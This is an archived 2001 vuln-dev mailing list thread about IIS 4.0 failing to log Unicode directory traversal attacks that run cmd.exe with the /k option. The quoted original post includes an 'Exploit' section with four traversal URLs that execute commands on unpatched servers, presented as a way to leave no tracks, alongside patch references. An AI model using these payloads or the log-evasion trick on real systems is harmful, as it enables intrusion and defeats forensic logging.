The problem looks like this: CMD /K [command] Execute a command and "still active" CMD /C [command] Execute a command and then finished. If you execute a cmd.exe?/k request this would be in active state until his finished this process instead of the cmd.exe?/c request that finishes the process inmediatly. Because of this the IIS that´s not log the process that has not come to an end. Atentamente, Pablo Aravena Martínez Consultor de Seguridad BYSECURE CSE S.A. PGP FingerPrint: 4109 41C1 A295 75D8 F159 D542 96C5 5E6D 2B08 F28A http://www.bysecure.com mailto:p.aravenaat_private > -----Mensaje original----- > De: ThEye [SMTP:theyeat_private] > Enviado el: jueves, 20 de diciembre de 2001 0:39 > Para: vuln-devat_private > CC: ndr113at_private > Asunto: sometimes IIS 4.0 don't write logs. > > <Hi: > > I don't know if this problem is documented but i didn't find anything > about > it anywhere. > > The problem is the following one: > > + Problem: > When I was playing with "Microsoft IIS and PWS Extended Unicode Directory > Transveral Vulnerability" ( BugtraqID = 1806 ) I found that if the > attacker > uses the "k" option of cmd ( cmd /k ) instead of the "c" option (cmd /c) > ,IIS 4.0 (with Extended Unicode Directory Transveral Vulnerability) > sometimes don't write logs of the attacker's activity. > > + Implications: > If an attacker uses this vulnerability to crack a web page or anything, > eventually no tracks will exist on the attacked server. > > + Final: > In PROBLEM I said "sometimes" because after a high number of requests to > "cmd /k" , IIS 4.0 write logs of some requests, still I don't know when > and > why IIS 4.0 write logs of the "cmd /k" request. > Anyone that can confirm or refute this please post it. > > > + Exploit: > I tested this problem on Windows NT Server 4.0 with IIS 4.0 just installed > > ( without any patch ). > > http://server.com/scripts/..%c1%pc../winnt/system32/cmd.exe?/k+dir > http://server.com/scripts/..%c0%af../winnt/system32/cmd.exe?/k+dir > http://server.com/msadc/..%c1%pc../winnt/system32/cmd.exe?/k+dir > http://server.com/msadc/..%c0%af../winnt/system32/cmd.exe?/k+dir > > Result: No tracks on log files. > > + More Information: > 1) Microsoft IIS and PWS Extended Unicode Directory Transversal > > http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=1806 > 2) Microsoft Patch prmcan4i > > http://download.microsoft.com/download/winntsp/Patch/q269862/NT4ALPHA/EN-U > S/prmcan4i.exe > > Roberto Alamos M. (theyeat_private) > www.350cc.com
This archive was generated by hypermail 2b30 : Thu Dec 20 2001 - 09:06:09 PST